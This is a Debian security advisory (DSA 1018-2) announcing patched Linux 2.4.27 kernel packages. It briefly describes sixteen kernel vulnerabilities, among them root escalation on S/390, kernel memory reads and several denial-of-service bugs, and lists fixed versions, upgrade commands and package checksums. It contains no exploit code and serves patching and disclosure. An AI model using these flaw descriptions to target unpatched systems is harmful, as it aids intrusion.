[SECURITY] [DSA 1018-2] New Linux kernel 2.4.27 packages fix several vulnerabilities
2006-04-05T00:00:00
ID DEBIAN:DSA-1018-2:0D13C Type debian Reporter Debian Modified 2006-04-05T00:00:00
Description
Debian Security Advisory DSA 1018-2 security@debian.org
http://www.debian.org/security/ Dann Frazier, Simon Horman
April 5th, 2006 http://www.debian.org/security/faq
The original update lacked recompiled ALSA modules against the new kernel
ABI. Furthermore, kernel-latest-2.4-sparc now correctly depends on the
updated packages.
For completeness we're providing the original problem description:
Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code. The Common Vulnerabilities and Exposures project identifies the
following problems:
CVE-2004-0887
Martin Schwidefsky discovered that the privileged instruction SACF (Set
Address Space Control Fast) on the S/390 platform is not handled properly,
allowing for a local user to gain root privileges.
CVE-2004-1058
A race condition allows for a local user to read the environment variables
of another process that is still spawning through /proc/.../cmdline.
CVE-2004-2607
A numeric casting discrepancy in sdla_xfer allows local users to read
portions of kernel memory via a large len argument which is received as an
int but cast to a short, preventing read loop from filling a buffer.
CVE-2005-0449
An error in the skb_checksum_help() function from the netfilter framework
has been discovered that allows the bypass of packet filter rules or
a denial of service attack.
CVE-2005-1761
A vulnerability in the ptrace subsystem of the IA-64 architecture can
allow local attackers to overwrite kernel memory and crash the kernel.
CVE-2005-2457
Tim Yamin discovered that insufficient input validation in the compressed
ISO file system (zisofs) allows a denial of service attack through
maliciously crafted ISO images.
CVE-2005-2555
Herbert Xu discovered that the setsockopt() function was not restricted to
users/processes with the CAP_NET_ADMIN capability. This allows attackers to
manipulate IPSEC policies or initiate a denial of service attack.
CVE-2005-2709
Al Viro discovered a race condition in the /proc handling of network devices.
A (local) attacker could exploit the stale reference after interface shutdown
to cause a denial of service or possibly execute code in kernel mode.
CVE-2005-2973
Tetsuo Handa discovered that the udp_v6_get_port() function from the IPv6 code
can be forced into an endless loop, which allows a denial of service attack.
CVE-2005-3257
Rudolf Polzer discovered that the kernel improperly restricts access to the
KDSKBSENT ioctl, which can possibly lead to privilege escalation.
CVE-2005-3783
The ptrace code using CLONE_THREAD didn't use the thread group ID to
determine whether the caller is attaching to itself, which allows a denial
of service attack.
CVE-2005-3806
Yen Zheng discovered that the IPv6 flow label code modified an incorrect variable,
which could lead to memory corruption and denial of service.
CVE-2005-3848
Ollie Wild discovered a memory leak in the icmp_push_reply() function, which
allows denial of service through memory consumption.
CVE-2005-3857
Chris Wright discovered that excessive allocation of broken file lock leases
in the VFS layer can exhaust memory and fill up the system logging, which allows
denial of service.
CVE-2005-3858
Patrick McHardy discovered a memory leak in the ip6_input_finish() function from
the IPv6 code, which allows denial of service.
CVE-2005-4618
Yi Ying discovered that sysctl does not properly enforce the size of a
buffer, which allows a denial of service attack.
The following matrix explains which kernel version for which architecture
fix the problems mentioned above:
Debian 3.1 (sarge)
Source 2.4.27-10sarge2
Alpha architecture 2.4.27-10sarge2
ARM architecture 2.4.27-2sarge2
Intel IA-32 architecture 2.4.27-10sarge2
Intel IA-64 architecture 2.4.27-10sarge2
Motorola 680x0 architecture 2.4.27-3sarge2
Big endian MIPS architecture 2.4.27-10.sarge1.040815-2
Little endian MIPS architecture 2.4.27-10.sarge1.040815-2
PowerPC architecture 2.4.27-10sarge2
IBM S/390 architecture 2.4.27-2sarge2
Sun Sparc architecture 2.4.27-9sarge2
The following matrix lists additional packages that were rebuilt for
compatability with or to take advantage of this update:
We recommend that you upgrade your kernel package immediately and reboot
the machine. If you have built a custom kernel from the kernel source
package, you will need to rebuild to take advantage of these fixes.
This update introduces a change in the kernel's binary interface, the affected
kernel packages inside Debian have been rebuilt, if you're running local addons
you'll need to rebuild these as well.
Upgrade Instructions
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get dist-upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
These files will probably be moved into the stable distribution on
its next update.
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
{"id": "DEBIAN:DSA-1018-2:0D13C", "bulletinFamily": "unix", "title": "[SECURITY] [DSA 1018-2] New Linux kernel 2.4.27 packages fix several vulnerabilities", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1018-2 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier, Simon Horman\nApril 5th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.4.27\nVulnerability : several\nProblem-Type : local/remote\nDebian-specific: no\nCVE IDs : CVE-2004-0887 CVE-2004-1058 CVE-2004-2607 CVE-2005-0449 CVE-2005-1761 CVE-2005-2457 CVE-2005-2555 CVE-2005-2709 CVE-2005-2973 CVE-2005-3257 CVE-2005-3783 CVE-2005-3806 CVE-2005-3848 CVE-2005-3857 CVE-2005-3858 CVE-2005-4618\n\nThe original update lacked recompiled ALSA modules against the new kernel\nABI. Furthermore, kernel-latest-2.4-sparc now correctly depends on the\nupdated packages.\n\nFor completeness we're providing the original problem description:\n\nSeveral local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2004-0887\n\n Martin Schwidefsky discovered that the privileged instruction SACF (Set\n Address Space Control Fast) on the S/390 platform is not handled properly, \n allowing for a local user to gain root privileges.\n\nCVE-2004-1058\n\n A race condition allows for a local user to read the environment variables\n of another process that is still spawning through /proc/.../cmdline.\n\nCVE-2004-2607\n\n A numeric casting discrepancy in sdla_xfer allows local users to read\n portions of kernel memory via a large len argument which is received as an\n int but cast to a short, preventing read loop from filling a buffer.\n\nCVE-2005-0449\n \n An error in the skb_checksum_help() function from the netfilter framework\n has been discovered that allows the bypass of packet filter rules or\n a denial of service attack.\n\nCVE-2005-1761\n\n A vulnerability in the ptrace subsystem of the IA-64 architecture can \n allow local attackers to overwrite kernel memory and crash the kernel.\n\nCVE-2005-2457\n\n Tim Yamin discovered that insufficient input validation in the compressed\n ISO file system (zisofs) allows a denial of service attack through\n maliciously crafted ISO images.\n\nCVE-2005-2555\n\n Herbert Xu discovered that the setsockopt() function was not restricted to\n users/processes with the CAP_NET_ADMIN capability. This allows attackers to\n manipulate IPSEC policies or initiate a denial of service attack. \n\nCVE-2005-2709\n\n Al Viro discovered a race condition in the /proc handling of network devices.\n A (local) attacker could exploit the stale reference after interface shutdown\n to cause a denial of service or possibly execute code in kernel mode.\n\nCVE-2005-2973\n \n Tetsuo Handa discovered that the udp_v6_get_port() function from the IPv6 code\n can be forced into an endless loop, which allows a denial of service attack.\n\nCVE-2005-3257\n\n Rudolf Polzer discovered that the kernel improperly restricts access to the\n KDSKBSENT ioctl, which can possibly lead to privilege escalation.\n\nCVE-2005-3783\n\n The ptrace code using CLONE_THREAD didn't use the thread group ID to\n determine whether the caller is attaching to itself, which allows a denial\n of service attack.\n\nCVE-2005-3806\n\n Yen Zheng discovered that the IPv6 flow label code modified an incorrect variable,\n which could lead to memory corruption and denial of service.\n\nCVE-2005-3848\n\n Ollie Wild discovered a memory leak in the icmp_push_reply() function, which\n allows denial of service through memory consumption.\n\nCVE-2005-3857\n\n Chris Wright discovered that excessive allocation of broken file lock leases\n in the VFS layer can exhaust memory and fill up the system logging, which allows\n denial of service.\n\nCVE-2005-3858\n\n Patrick McHardy discovered a memory leak in the ip6_input_finish() function from\n the IPv6 code, which allows denial of service.\n\nCVE-2005-4618\n\n Yi Ying discovered that sysctl does not properly enforce the size of a\n buffer, which allows a denial of service attack.\n\nThe following matrix explains which kernel version for which architecture\nfix the problems mentioned above:\n\n Debian 3.1 (sarge)\n Source 2.4.27-10sarge2\n Alpha architecture 2.4.27-10sarge2\n ARM architecture 2.4.27-2sarge2\n Intel IA-32 architecture 2.4.27-10sarge2\n Intel IA-64 architecture 2.4.27-10sarge2\n Motorola 680x0 architecture 2.4.27-3sarge2\n Big endian MIPS architecture 2.4.27-10.sarge1.040815-2\n Little endian MIPS architecture 2.4.27-10.sarge1.040815-2\n PowerPC architecture 2.4.27-10sarge2\n IBM S/390 architecture 2.4.27-2sarge2\n Sun Sparc architecture 2.4.27-9sarge2\n\nThe following matrix lists additional packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n Debian 3.1 (sarge)\n kernel-latest-2.4-alpha 101sarge1\n kernel-latest-2.4-i386 101sarge1\n kernel-latest-2.4-s390 2.4.27-1sarge1\n kernel-latest-2.4-sparc 42sarge2\n kernel-latest-powerpc 102sarge1\n fai-kernels 1.9.1sarge1\n i2c 1:2.9.1-1sarge1\n kernel-image-speakup-i386 2.4.27-1.1sasrge1\n lm-sensors 1:2.9.1-1sarge3\n mindi-kernel 2.4.27-2sarge1\n pcmcia-modules-2.4.27-i386 3.2.5+2sarge1\n systemimager 3.2.3-6sarge1\n alsa-modules-i386 1.0.8+2sarge1\n\nWe recommend that you upgrade your kernel package immediately and reboot\nthe machine. If you have built a custom kernel from the kernel source\npackage, you will need to rebuild to take advantage of these fixes.\n\nThis update introduces a change in the kernel's binary interface, the affected\nkernel packages inside Debian have been rebuilt, if you're running local addons\nyou'll need to rebuild these as well.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get dist-upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge2.diff.gz\n Size/MD5 checksum: 713256 04938bd9582171f13459f40245fdb402\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-latest-2.4-alpha_101sarge1.dsc\n Size/MD5 checksum: 685 8d2419804b5d12e4602271c26dcad450\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge3.dsc\n Size/MD5 checksum: 1089 13968c7c9bb075bad3b2cb95feef384c\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-powerpc-2.4.27_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 1129 4396133a6b96b9dbceb66d2a48852d88\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge3.diff.gz\n Size/MD5 checksum: 32931 119d0d836ed566e15624f809701d0ab9\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-latest-2.4-i386_101sarge1.dsc\n Size/MD5 checksum: 1345 1a4ebdb73d7bd94d2b0d51b75f5451cc\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-alpha_2.4.27-10sarge2.tar.gz\n Size/MD5 checksum: 30119 0df45f3ce9d32988eed0d9567cf0b4fa\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-ia64_2.4.27-10sarge2.tar.gz\n Size/MD5 checksum: 53307 d8a5d2061c0790cfd9467864502818e3\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-i386_3.2.5+2sarge1.tar.gz\n Size/MD5 checksum: 101556 397541e2aa7fc958a4852dffa6c8d1fb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-sparc_2.4.27-9sarge2.dsc\n Size/MD5 checksum: 1074 ba4f46144c5db2a3c76358689fdb0185\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-arm_2.4.27-2sarge2.tar.gz\n Size/MD5 checksum: 32208 71392893f2e012ffafaab2bb43f8e488\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-s390_2.4.27-2sarge2.dsc\n Size/MD5 checksum: 831 687b8a0516c44a1527a90f5df5c772ab\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager_3.2.3-6sarge1.tar.gz\n Size/MD5 checksum: 15975115 9fd8b15f9f92314ea9cea3f22a77ec5b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-arm_2.4.27-2sarge2.dsc\n Size/MD5 checksum: 839 878a7971258f25a1c17fdb6362e9909f\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 900 efe323453f0dc718c6d9490ca3ca691e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-latest-2.4-i386_101sarge1.tar.gz\n Size/MD5 checksum: 2617 cf7e82afaef00b0cf93521fdccf4ed5c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-m68k_2.4.27-3sarge2.tar.gz\n Size/MD5 checksum: 9841 53b6e1fe5e9060c93ef9ff91cedf490f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-ia64_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 1143 9cc5658049d0158385bc82424ab75361\n http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27.orig.tar.gz\n Size/MD5 checksum: 9501 a4ad085824ade5641f1c839d945dd301\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-latest-2.4-s390_2.4.27-1sarge1.tar.gz\n Size/MD5 checksum: 1597 fcbb9bc6a69ad10f0712ea03cad557ef\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-latest-2.4-alpha_101sarge1.tar.gz\n Size/MD5 checksum: 1950 c4a4fbe2095a7d43cf6b33cc9c73f372\n http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge1.diff.gz\n Size/MD5 checksum: 2786 a0a40636362e7f5c03ffae5fca94edbd\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-patch-powerpc-2.4.27_2.4.27-10sarge2.tar.gz\n Size/MD5 checksum: 1462678 eab044878df015bbf85329c2498ed8e8\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-sparc/kernel-image-2.4.27-sparc_2.4.27-9sarge2.tar.gz\n Size/MD5 checksum: 20216 0ae4467cf28f4a513e68c2d6ba413d9b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-i386_2.4.27-10sarge2.tar.gz\n Size/MD5 checksum: 97376 1a3af863ee67797a398cc33c1b3fcf3c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-i386_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 1581 53d1f65a236f842d634d2f472d761792\n http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1-1sarge1.dsc\n Size/MD5 checksum: 857 6c617b10e65d623d40a8c5d6d89107f9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-s390/kernel-image-2.4.27-s390_2.4.27-2sarge2.tar.gz\n Size/MD5 checksum: 8212 0598b1ff05e1d4dd4c434a39c9f018a6\n http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge1.dsc\n Size/MD5 checksum: 750 4d8bed84c0e377a458977c40ef253a64\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1.orig.tar.gz\n Size/MD5 checksum: 870765 f5af615e39441d95471bdb72a3f01709\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager_3.2.3-6sarge1.dsc\n Size/MD5 checksum: 1012 0fcee4cf17e43873f37e6920aa11dd1c\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-speakup-i386_2.4.27-1.1sarge1.dsc\n Size/MD5 checksum: 732 99407eb60a651fe0d937fc9ce0942885\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27.orig.tar.gz\n Size/MD5 checksum: 38470181 56df34508cdc47a53d15bc02ffe4f42d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-m68k_2.4.27-3sarge2.dsc\n Size/MD5 checksum: 875 9af3fd80b96a54759a11563dc735f349\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-alpha_2.4.27-10sarge2.dsc\n Size/MD5 checksum: 831 fb35a83abc577050eefca213f1c1e5ef\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-i386_3.2.5+2sarge1.dsc\n Size/MD5 checksum: 825 5ddcf45bf8e95a7f1004e6ad97d9502e\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-patch-2.4.27-mips_2.4.27-10.sarge2.040815-1.tar.gz\n Size/MD5 checksum: 307908 19a86536a0b624c16cb95e6277510eeb\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-s390/kernel-latest-2.4-s390_2.4.27-1sarge1.dsc\n Size/MD5 checksum: 663 32e3700237d6c8399991db0cb219ca2b\n http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1.orig.tar.gz\n Size/MD5 checksum: 142961 eb3d1df2d3b46f199af2485db612c76d\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-speakup-i386_2.4.27-1.1sarge1.tar.gz\n Size/MD5 checksum: 16651 4681c5a0ef28cf92bc861a477859f424\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-patch-2.4.27-mips_2.4.27-10.sarge2.040815-1.dsc\n Size/MD5 checksum: 1051 1063b480da66a98327389106a60fd1de\n http://security.debian.org/pool/updates/main/i/i2c/i2c_2.9.1-1sarge1.diff.gz\n Size/MD5 checksum: 9623 3900d3b14fc77579eb661dac9d7becdb\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-latest-2.4-sparc_42sarge2.dsc\n Size/MD5 checksum: 848 54a0059bc7215f82dd95c64e729b0dd4\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-sparc/kernel-latest-2.4-sparc_42sarge2.tar.gz\n Size/MD5 checksum: 2243 7dd011636f037d3e004e202cdcef99dd\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-patch-debian-2.4.27_2.4.27-10sarge2_all.deb\n Size/MD5 checksum: 671384 656244ac0eeb0edfd0eec5cf80526303\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-source_2.9.1-1sarge3_all.deb\n Size/MD5 checksum: 945646 e1bc68ea39ee276dfb3a24318c8aa765\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-doc-2.4.27-speakup_2.4.27-1.1sarge1_all.deb\n Size/MD5 checksum: 2418378 cebb78cbbb3762c243f99b86884cc5ac\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-boot-ia64-standard_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 9542922 f8049a1e8cee07d0e2a1fdc7357e252a\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-boot-i386-standard_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 4758102 b469e5a3b6bc93a459274310199899a7\n http://security.debian.org/pool/updates/main/i/i2c/i2c-source_2.9.1-1sarge1_all.deb\n Size/MD5 checksum: 159912 1c1283ab19292c86be4fa765840eff13\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-doc-2.4.27_2.4.27-10sarge2_all.deb\n Size/MD5 checksum: 3578772 5b413310b3826dec3f0113e1215ca51f\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-tree-2.4.27_2.4.27-10sarge2_all.deb\n Size/MD5 checksum: 25710 12d938fd6fe17432924452f0f8ae039f\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-common_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 29630 81379a2aae787fcb85eb937cffb8e62e\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-doc_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 630106 3557f0934650e872d93b88b5150f9815\n http://security.debian.org/pool/updates/main/i/i2c/kernel-patch-2.4-i2c_2.9.1-1sarge1_all.deb\n Size/MD5 checksum: 106132 81b855594bb23ab228c447f2f5343c8e\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-server_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 115340 5e1b98b83d853a2a0c24695ff1c82251\n http://security.debian.org/pool/updates/main/k/kernel-source-2.4.27/kernel-source-2.4.27_2.4.27-10sarge2_all.deb\n Size/MD5 checksum: 31030888 b556d3b35835290ef34e01c23b0dfb7b\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-client_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 29366 b65b98e266e64ff2a5cdd74558a0a922\n http://security.debian.org/pool/updates/main/s/systemimager/systemimager-server-flamethrowerd_3.2.3-6sarge1_all.deb\n Size/MD5 checksum: 14680 d45c6cd85a3bb2d3388d9bbe6cc422e5\n http://security.debian.org/pool/updates/main/l/lm-sensors/kernel-patch-2.4-lm-sensors_2.9.1-1sarge3_all.deb\n Size/MD5 checksum: 304520 cad3f6be07e47fc9163882225608a2c5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 4572390 9d8b171c601c6aa551bcb9a2be6862f1\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-image-2.4-smp_101sarge1_alpha.deb\n Size/MD5 checksum: 1986 bda45dedcf2b5ed4f6b8d030f18e11b6\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-image-2.4-generic_101sarge1_alpha.deb\n Size/MD5 checksum: 1982 7ee85d7e5e2753a2b379de867c127c78\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-3-generic_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 16518544 b49f831395ee62bde73f0aad25ddd438\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-image-2.4.27-3-smp_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 16968168 db461b6d5cfb842ead1420c0edb61f99\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3-generic_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 270900 5e321af02b9c205f38bbc4be49fbc9a8\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-headers-2.4-generic_101sarge1_alpha.deb\n Size/MD5 checksum: 1980 475f0b3c517d16740be06abbc4e3d4a9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-build-2.4.27-3_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 5732 43ca0eeaab913f6faef8eb5a2f432741\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-alpha/kernel-headers-2.4.27-3-smp_2.4.27-10sarge2_alpha.deb\n Size/MD5 checksum: 272828 9c7e1914da800e5e98fd6336c9ad6060\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-alpha/kernel-headers-2.4-smp_101sarge1_alpha.deb\n Size/MD5 checksum: 1980 6da3aab7853283f763332efde9619e7c\n\n ARM architecture:\n \n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-headers-2.4.27_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 4657792 6efae5dc812abfc779c02c402df0fd3d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-riscpc_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 3142828 79bb6bed414464dfb134ca5be8eb0d9a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-riscstation_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 3665410 a91d34d5ddf87dfb43d2fa1252679d70\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-netwinder_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 7330418 38c4e7edaf85174e42c1a0272cd71090\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-lart_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 1054774 e098137f0ef0d731443810ee9eaed718\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-build-2.4.27_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 463856 eaa7abc8f41e6e10ca123b8c27f348a9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-arm/kernel-image-2.4.27-bast_2.4.27-2sarge2_arm.deb\n Size/MD5 checksum: 1689532 d636ec6606fd50d41fc4f6f5e5d5e103\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-2.4.27-speakup_2.4.27-1.1sarge1_i386.deb\n Size/MD5 checksum: 11302740 d57ff9246788c39d98903f7b3270fabd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 1823622 2acb45e3fed2a4d7f2e952a258864081\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-686_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 12338568 be29794a003a05edc00e3a03d34b3eea\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-686-smp_101sarge1_i386.deb\n Size/MD5 checksum: 2286 4b863896be1e22d0c1005131b8f9bfec\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k6_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 258984 f0ca8379fd4fe3e7bd07480630d01b05\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k6_101sarge1_i386.deb\n Size/MD5 checksum: 2158 b17c62827446c35c0e8f787a262aa180\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-586tsc_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 298250 836b9106a35174e7232c018cd2d2c71a\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k7_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477580 24ef30a122508783dc22e87a43923e45\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-3-386_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 11049922 6548a659a11435f1b6ebcefd850c7b69\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-3-k7-smp_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 299950 27e5ee810fc890b649ad25cc2edff073\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-386_101sarge1_i386.deb\n Size/MD5 checksum: 2168 1b80507c432362c471b60ee18b47d0b4\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-586tsc_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 258980 cf019b62e65a17b0ed20e149faa44559\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-386_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 267748 9555f73de465bd2114d0caf2a41acff2\n http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-686-smp_2.9.1-1sarge3_i386.deb\n Size/MD5 checksum: 259572 9505af261ada93ee26c66a3fb0d7d82e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-586tsc_101sarge1_i386.deb\n Size/MD5 checksum: 2164 ac150587b9d3f22de309ea312f11c321\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-686-smp_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 484192 c46d1f7e98b6b3e625158ddaca907951\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-386_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477610 61f0e8d1bd3dcbf8447a15f3986710ce\n http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-586tsc_3.2.5+2sarge1_i386.deb\n Size/MD5 checksum: 477644 302afa94885da8c4f143b8f5aa3476b0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-k7_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 292198 ff62442bd8a017f09636faa7087eaf08\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-386_101sarge1_i386.deb\n Size/MD5 checksum: 2176 8f3ad5ed0dc40fc3d9427412798905ca\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-3-686_2.4.27-10sarge2_i386.deb\n Size/MD5 checksum: 298386 aae34ecc6770f907d0b7de0e7203fac6\n 